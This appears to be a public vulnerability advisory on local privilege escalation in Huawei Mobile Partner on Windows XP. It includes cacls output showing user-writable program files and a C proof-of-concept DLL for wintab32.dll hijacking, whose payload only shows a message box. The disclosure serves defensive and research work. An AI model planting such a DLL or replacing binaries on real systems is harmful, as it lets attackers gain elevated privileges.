# Title: Huawei Mobile Partner Multiple Vulnerabilities
# Version: 23.009.05.03.1014
# Tested on: Windows XP SP2 en
# Vendor: http://www.huawei.com/
# Software-Link: http://download-c.huawei.com/download/downloadCenter?downloadId=18474&version=16815&siteCode=worldwide
# E-Mail: osanda[at]unseen.is
# Author: Osanda Malith Jayathissa
# /!\ Author is not responsible for any damage you cause
# Use this material for educational purposes only
#1| Local Privilege Escalation
--------------------------------
- Description
==============
Any user in the system can modify the legitimate binary to any kind of malicious executable.
The user could also place a malicious wintab32.dll file inside the "Mobile Partner" folder and
perform DLL hijacking easily. If an attacker break into a low privilege account he could use
this application to escalate his privileges.
- Proof of Concept
===================
C:\Program Files>cacls "Mobile Partner"
C:\Program Files\Mobile Partner BUILTIN\Users:(OI)(IO)F
BUILTIN\Users:(CI)F
NT SERVICE\TrustedInstaller:(ID)F
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
CREATOR OWNER:(OI)(CI)(IO)(ID)F
C:\Program Files>cd "Mobile Partner"
C:\Program Files\Mobile Partner>cacls "Mobile Partner.exe"
C:\Program Files\Mobile Partner\Mobile Partner.exe BUILTIN\Users:F
BUILTIN\Users:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
#2| Dll Hijacking Vulnerability (wintab32.dll)
-----------------------------------------------
#include <windows.h>
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH: owned();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int owned() {
MessageBox(0, "Mobile Partner DLL Hijacked\nOsanda Malith", "POC", MB_OK | MB_ICONWARNING);
}
/*EOF*/
